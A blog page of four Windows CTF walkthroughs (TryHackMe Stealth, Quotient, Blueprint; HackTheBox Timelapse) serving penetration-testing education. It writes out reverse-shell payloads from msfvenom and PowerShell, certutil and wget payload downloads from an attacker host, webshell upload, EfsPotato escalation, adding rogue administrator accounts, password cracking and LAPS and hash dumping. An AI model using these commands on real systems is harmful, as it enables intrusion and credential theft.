Windows penetration testing

TryHackMe- Stealth

Posted on 9 January 202410 January 2024 by CyberiumX

Hello folks,
This blog focuses on a medium-level machine called ‘Stealth‘ available on the ‘TryHackMe‘ platform, offering a chance to breach a Windows operating system. This challenge acts as an initial assessment to gauge your proficiency in red teaming abilities. The ‘Stealth‘ machine will test your skill in utilizing Pentesting tools such as Rustscan, Netcat, PowerShell scripts, csc.exe, and more. Let’s begin the penetration testing process promptly without any delay.
You can access the Stealth machine on TryHackMe.
First of all let’s start the machine by clicking on ‘Start Machine’ and after waiting for 3-4 minutes, scan the obtained IP using the tool ‘Rustscan’.

rustscan -a <Machine_IP>

After getting the results from Rustscan, we cannot say what services are running on some specific ports. We can run nmap to grab banners related to those ports and get their service versions using the following command:

nmap -sS -sV -p5985,7680,8000,8080,8443,47001,49664-49680 <Machine_IP>

Getting User Access on Stealth

We have 15 ports open on the target machine where HTTP service is running on 5 ports- 5985, 8000, 8080, 8443 and 47001. Also, in the lab description we are provided with <Machine_IP>:8080 port on which HTTP service is running. So, let’s open our web browser and access the 8080 port.

We have an upload functionality for ‘Powershell Script Analyzer’ on the website. Let’s find a reverse shell script written in powershell language on the internet, change the IP address to our own tun0 IP address and specify an available port.

Now, we have to upload the script into the functionality provided on the webpage. Before uploading the .ps1 file, we have to start listening using netcat as follows:

nc -nlvp 1337

After uploading the reverse shell script, we have to wait for 3-4 seconds as the script will be analysed on the server and we will get the reverse connection on our netcat listener.

After waiting, we can see that we got the reverse shell connection as ‘evader’ user. In order to hunt for the user flag, let’s move to ‘C:\Users\evader\Desktop’ and there we will find a file with the name ‘encodedflag’. If we read the file, we can see that the message is encoded with the Base64 encoding algorithm.

We can decode the message using the following command:

echo “<Encoded_message>” | base64 -d

After running the command we will get a hint saying that we have to visit the provided URL in order to get the flag.

Let’s visit the provided URL on the browser to get the flag. There is another hint mentioned on the webpage. The hint says that we have to remove the logs from the server for the uploaded files.

If we go to the web directory located at ‘C:\xampp\htdocs’, we will find an ‘uploads’ directory under which we have a file named ‘log.txt’. Let’s delete the file using the following command:

del log.txt

After deleting the logs, if we refresh the webpage we will find our user flag. This ensures that we get user level access on the target machine. Now, we have to perform privilege escalation to become Administrator.

Privilege Escalation on Stealth

There is a file in the ‘uploads’ directory named ‘vulnerable.ps1’. Let’s try to read the contents of the file using the ‘type’ command.

We can see that the contents of this file will help us to get the reverse shell access of the same user. Let’s copy the contents of this file and open another terminal on our machine and create a file with the same name and paste the contents. We have to replace the IP address with our tun0 IP and mention an available port number.
Now, we have to upload the modified vulnerable.ps1 file to the web server which will override the original file with the new one. Now we can simply start the listening using netcat and execute the script with the help of following commands:

On our machine: nc -nlvp 1234
On target machine: ./vulnerable.ps1

We can see that we got a reverse shell on the netcat listener.

We have to check our privilege as evader user on this shell for which we can use the following command:

whoami /priv

The mentioned privileges are not vulnerable and we cannot take advantages of them. We can use any privilege escalation script to identify different ways to become Administrator/System user on this machine. We have a script written in powershell scripting language called ‘PrivescCheck’. Let’s download it from Github and upload it through the file upload functionality available on the website.
Now let’s execute the script using the following command mentioned on the GitHub repository:

powershell -ep bypass -c “. .\PrivescCheck.ps1; Invoke-PrivescCheck”

It will take a minute to generate the output.

If we check under ‘Service Binary permissions’ section, we will find that evader user has full permissions on Apache2.4 service and can take full access as ‘Evader’ user on this machine.
We can use ‘P0wny Shell‘ here. Let’s download it on our machine from Github and then upload it on target machine by creating a python3 web server using following command:

python3 -m http.server 7777

Now on target machine use the following command to download the malicious script at ‘c:\xampp\htdocs’ directory:

wget http://<Your_IP>:7777/p0wny.php -o p0wny.php

We will find the malicious file is downloaded and now can be executed from the website using our web browser. Make a request to the following URL:

http://<Machine_IP>:8080/p0wny.php

This is to execute the malicious webshell and provide us the reverse shell of the target website. Now we can check our level of privilege on the target machine using following command:

whoami /priv

In the output, we can see that we have a vulnerable privilege available ‘SeImpersonatePrivilege’ which can be exploited with the help of EfsPotato.
In this GitHub repository, we have a ‘.cs’ file which we have to compile on our target machine. Let download this file on our Kali machine and then run python3 web server to host the file so that we can share the file with our target machine using following command:

wget http://<Your_IP>:7777/EfsPotato.cs -o EfsPotato.cs

After downloading the file, we have to compile this file into an exe file using the commands available on the same GitHub repository. But before it, we have to find the version of Microsoft.NET framework version so that we can use a C# compiler called csc.exe to compile the .cs file and produce an executable (.exe) file.
If we try to change the directory to ‘C:\Windows\Microsoft.NET\framework’, we will find the version of it. The version is ‘v4.0.30319’. Now we have to go back to ‘C:\xampp\htdocs’ directory and type the following command in order to compile the file:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

If we check our current directory, we will find a new exe file which is created ‘EfsPotato.exe’. Finally, we need to use this binary and try to execute commands as ‘System’ user. Let’s try to run the following command to confirm the same:

EfsPotato.exe “whoami”

We will find that we are running these commands as ‘System’ user. Great! Now we need to find a way to become Administrator. We can use some commands which will allow us to create a new user on the machine and add that user to ‘administrators’ group so that we can gain access to the machine using RDP and then access any binary as administrator user. We have to use a command as follows:

EfsPotato.exe “cmd.exe /c net user CyberiumX Password@123 /add && net localgroup administrators CyberiumX /add”

where, ‘CyberiumX’ is the name of the user and ‘Password@123’ is the login password for this user.

Note- The target windows has a policy build which only allows strong passwords which contains uppercase, lowercase, special characters and numbers.

We will find that the command is executed successfully. Now let’s try to login on the target machine with ‘CyberiumX’ user as the RDP port (3389) is open on the target machine. We can use the following command to get graphical access on the machine:

xfreerdp /v:<Machine_IP> /u:CyberiumX /p:Password@123 /workarea /smart-sizing

After getting access to the machine, we can execute Command Prompt using the ‘Administrator’ user as we are a part of the administrators group. After getting the administrator shell we can move to ‘C:\Users\Administrator\Desktop’ location and read the contents of the flag.

We have successfully compromised the Stealth machine of TryHackMe.
In this CTF, we learned about some new concepts for getting access using different powershell scripts. You can check out our other blogs for compromising Windows machines on CyberiumX.

Happy Pentesting!!!

Team CyberiumX

HackTheBox- Timelapse

Posted on 31 July 202320 September 2023 by CyberiumX

Hello folks,

This blog focuses on a machine called “Timelapse” within HackTheBox. It has been classified as an easy machine. It is based on the Windows Operating System. You will be learning about Windows Enumeration and Privilege Escalation. Let’s proceed without any delay and begin the penetration testing process.

You can find the machine in the retired category of HackTheBox over here.

First of all let’s start the machine by clicking on “Join Machine” and scan the obtained IP using “NMAP”.

sudo nmap -sS <Machine_IP>

We can see that there are many ports open such as DNS (53), Kerberos (88), LDAP (389), SMB (445), etc. which confirms that this machine is a Domain controller in an Active Directory environment. Let us move further and start the enumeration process with SMB.

Firstly, we will see the available shares and their permissions with the help of smbmap tool using the following command.

smbmap -H <Machine_IP> -u “CyberiumX”

Here, I have provided any username like CyberiumX which will be treated as a guest account. We get an available share with Read permission named “Shares”

After that we can use smbclient to connect with the available share.

smbclient \\\\<Machine_IP>\\Shares

Now, we will check what content we have here on the “Shares” share using dir command. We will find some directories here, so let us visit them one by one and look for some critical files. After looking into the Dev directory we found a file named winrm_backup.zip which looks very interesting. Let’s download it using following command and look for some other important files:

get winrm_backup.zip

We got nothing special in the other directory, so let us exit from here and try to unzip the compressed file using the following command:

unzip winrm_backup.zip

We will find that there is a pfx file inside the zip file but we cannot decompress it because it requires a password. So in order to get the password of it we need to generate the password hash out of the zip file using zip2john tool as follows:

zip2john winrm_backup.zip > zip_password.txt

We have the password hash of the zip file. Now we can simply use john the ripper on our zip_password.txt file which contains the hash of the zip file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt zip_password.txt

And then we can simply decompress the file with the password we just obtained using the following command:

unzip winrm_backup.zip

It will decompress a file with the name “legacyy_dev_auth.pfx”. Here legacyy or legacyy_dev looks like a username.

Getting Foothold on Timelapse

Now using the pfx file we can generate .pem and .crt files which will help us to take access to the Windows machine using WinRM. In order to generate the pem file, we can simply use the following command: (This will require a password that we do not know. Let us check.)

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

We got an error as invalid password as we do not have access to the password of the pfx file.

Now we need to get the password hash of the pfx file using a tool named pfx2john. This tool is located at /usr/share/john. In order to get the hash, we need to copy the pfx file to /usr/share/john and then we need to run the following command:

sudo ./pfx2john.py legacyy_dev_auth.pfx > /home/CyberiumX/pfx_hash.txt

This will provide us with the hash of the pfx file. Now, we will again use john the ripper tool to get the password of the pfx file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt pfx_hash.txt

John the ripper successfully provided us the password of pfx file and now we can finally generate pem file using the same command as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

It asked for a pass phrase which we can set of our choice.

Next, we will generate the crt file using the same tool openssl and pfx file as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out CyberiumX_cert.crt

We can see that we have both the files here.

Now we have to generate a pem file with RSA asymmetric encryption signature because it will be used to take the remote shell using WinRM. So, we will use the following command to create it:

openssl rsa -in CyberiumX_key.pem -out CyberiumX_rsa.pem

Okay. So, now after everything we have done we will use Evilwinrm tool to get the remote access of the target machine. We will provide Machine’s IP, username as legacy, CyberiumX_rsa.pem as Key file with RSA signature and CyberiumX_cert.crt as our certificate file as follows:

evil-winrm -i <Machine_IP> -u legacyy -k CyberiumX_rsa.pem -c CyberiumX_cert.crt –S

Great!!! We got our foothold on Timelapse. We can go to User’s Desktop and look for User.txt file.

Now after trying different methods to escalate the privileges, we found password for a user named svc_deploy in the history of Powershell using following command:

cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Let’s take the access of svc_deploy user on Timelapse using Evilwinrm tool as follows:

evil-winrm –I <Machine_IP> -u svc_deploy -p ‘<password>’ -S

Privilege Escalation on Timelapse

Now, we need to find our way to get Administrative access on Timelapse.
In the Documents folder of svc_deploy user, we are getting a directory named AdmPwd.PS.

So, I researched this directory on Google and heard about LAPS (Local Administrator Password Solution) which provides a solution to manage local account passwords of domain joined computers. Hence the name of machine is Time-LAPS

You can check out the article by HackTricks about LAPS Penetration Testing.
Now let us check if the following registry is set or not:

reg query “HKLM\Software\Policies\Microsoft Services\AdmPwd” /v AdmPwdEnable

This is set on the target machine. Let us confirm that is there any group related to LAPS using the following command:

net groups /domain

So, we have a group named LAPS_Readers which is a domain group.
Now let us finally confirm whether we are a member of this group using the following command:

net groups “LAPS_Readers” /domain

Great!!! We are a member of this group. Now we need to find a way to get the password of Administrator users using LAPS.
After searching a lot on the internet I finally found one command which requires the name of the DC as an argument. So let’s first get the name of DC using the following command:

Get-AdDomainController

We will find that the name of the DC is dc01. So using this name we can now run our final command which will extract the password for the admin user and show it to us on the screen. The command is as follows:

Get-ADComputer dc01 -Properties ms-Mcs-AdmPwd

Hurray!!! We got the password of the administrator user. Let us again use evilwinrm tool to get access to the administrator user using the looted credentials. The command is as follows:

evil-winrm -i <Machine_IP> -u administrator -p ‘<password>’ –S

Yeah!!! We have administrative access here. Now we need to read the contents of root.txt file which we could not find in the Administrator directory. So I checked the Users folder and there we have another user named TRX. So, I checked the Desktop of the TRX user and there I found the root.txt file which we can read with the help of the type command.

So, this was all about the Timelapse machine by HackTheBox. We learned about some new terms here like How to get the password hash of a pfx file and how to crack it, how to get access using key and crt files, about LAPS, etc.

You can checkout out other blogs on HackTheBox machines here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe- Quotient

Posted on 7 July 202319 September 2023 by CyberiumX

Hello folks,

This blog focuses on a recently added machine called “Quotient” on the “TryHackMe” platform. It has been classified as an Easy-level challenge. It will help you to sharpen your windows privilege escalation skills. Let’s proceed without any delay and begin the penetration testing process.

Click here to access Quotient machine.

First of all let’s start the machine by clicking on “Start Machine”. Scan the obtained IP using the tool “NMAP”.

nmap -Pn <Machine_IP>

This machine is a windows machine so we will use –Pn not to ping the machine.

You can see that only the RDP (3389) port is open and we are provided with the credentials. So let’s log in with the help of xfreerdp. You can use any RDP access tool like Remmina or rdesktop.

xfreerdp /v:Machine_IP /u:sage /p:”gr33ntHEphgK2&V” /workarea /smart-sizing

So we got the Graphical User Interface (GUI) access of the machine. We need to find a way to escalate our privileges.

I tried various methods like Abusing Dangerous Privileges, Harvesting passwords from usual spots and scheduled tasks, but got nothing interesting. Then I tried the abusing service misconfiguration and got some interesting output using the following command

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v “C:\Windows\\”

This command is searching for those services whose BINARY_PATH_NAME contains Unquoted Service Path.

So, I got a few services and out of them only one contains an Unquoted Service Path which is “Development Service”.

Now let’s get more information about the service using:

sc qc “Development Service”

Great! The service is executed on the behalf of LocalSystem. Now in order to exploit it we need to look for a writable directory within the provided Binary Path. So for that we can use the “icacls” command with the directory path name.

icacls “C:\Program Files\Development Files”

We can confirm from here that we as a member of Users group have writable permission on this directory. So, we are now good at exploiting it. For that, let’s create a service payload using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=4444 -f exe-service -o Devservice.exe

Now we can execute python server to host the file using

python3 –m http.server 7777

And we can download the file in “C:\Program Files\Development Files” using certutil command

certutil –urlcache -f http://<Your_IP>:7777/Devservice.exe Devservice.exe

Now provide appropriate permission to the file which we just downloaded on windows machine using:

icacls Devservice.exe /grant Everyone:F

Next thing is to start the listener on our machine using Netcat

nc –nlvp 4444

Now we just need to restart the service using “sc” command

sc stop “Development Service”

But you will find that we do not have the permission to do the same.

So, we can simply restart the system which will restart the service by default and help us to get the escalated shell on our netcat listener.

It took around 1-2 minutes for the system to restart and start the “Development Service”. As soon as the system restarts, you will find that you have a reverse shell as “nt authority\system” user.

Boom!!! We got elevated access on the device. You can check out the final flag at C:\Users\Administrator\Desktop using the following command:

type C:\Users\Administrator\Desktop\flag.txt

Quotient is a great box to explore windows privilege escalation techniques. Thanks to TryHackMe for this great machine.

Also, you can check out our other blogs on Cyber Security and Penetration testing here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe- Blueprint

Posted on 1 July 202319 September 2023 by CyberiumX

Hello folks,

This blog focuses on a recently added machine called “Blueprint” on the “TryHackMe” platform. It has been classified as an easy-level challenge where we need to penetrate our way into a windows machine. Let’s proceed without any delay and begin the penetration testing process.

Click here to access the Blueprint Machine.

First of all let’s start the machine by clicking on “Start Machine”. Scan the obtained IP using the tool “NMAP”.

nmap -sS <Machine_IP>

Okay, so we have a lot of ports open (expected from a windows machine). Let’s start with our enumeration from HTTP ports which are 80, 443 and 8080.

Port 80 gives “File not found” error. Port 443 (HTTPS) and 8080 (HTTP) are providing the same website in response.

There is a directory mentioned on the webpage with the name “oscommerce-2.3.4/”. It looks like an application with version details. Let’s peek inside it.

Let’s straightaway look for any vulnerability for this version on Google. There are many vulnerabilities related to this version and the next version to it which is 2.3.4.1. I found something which is very interesting in a Github repository. You can check it out here.

Let’s clone the repository and see how to use the python script.

Usage is given in the script itself which provides following command:

python3 osCommerce2_3_4RCE.py http://<Machine_IP> /oscommerce-2.3.4/catalog

So, let’s use this command on both ports which is 443 and 8080 as they are running the same website.

Booomm!!! We got the shell as nt authority\system using the exploit on the 8080 port. This was very easy.

Let’s look for users on the machine.

We have two tasks here. First is to get the NTLM hash of “Lab” user and then crack it and second is to get the content of root.txt.

Firstly, let’s try to read the root flag which will be stored in the Desktop of Administrator user. Also, here we are not able to change our present directory using cd command.

Yeah, so we got the root flag which was stored in a txt square file. Now our task is to get the Lab user’s password. So for that let’s check out the architecture of the target windows machine using systeminfo command. I tried to upload the mimikatz_x86.exe file but it didn’t execute and hanged my shell.

So now let’s create a msfvenom payload and get the shell using metasploit framework on exploit/multi/handler.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_machine_IP> LPORT=4444 -f exe -o winshell.exe

Also, let’s start python server to share the file on windows machine.

sudo python3 -m http.server 7777

Now, in order to download the file let’s execute certutil command on Windows

certutil -urlcache -f http://<Your_Machine_IP>:7777/winshell.exe winshell.exe

Let’s now prepare our reverse shell listener on the metasploit framework using msfconsole command.

Then type following commands to set the listener:

use exploit/multi/handler

show options

set lhost tun0

set payload windows/meterpreter/reverse_tcp

exploit

Simply execute the winshell.exe file on windows and you will get a reverse shell on your handler.

Now we need to dump the user’s hashes using the hashdump command of the meterpreter shell.

Now simply copy the NTLM hash of the Lab user and go to crackstation and crack the hash.

So, that’s all for this machine. Blueprint is overall a very easy box by TryHackMe for Windows machines.

Also, you can check out our other blogs on Cyber Security and Penetration testing here.

Happy Pentesting!!!

Team CyberiumX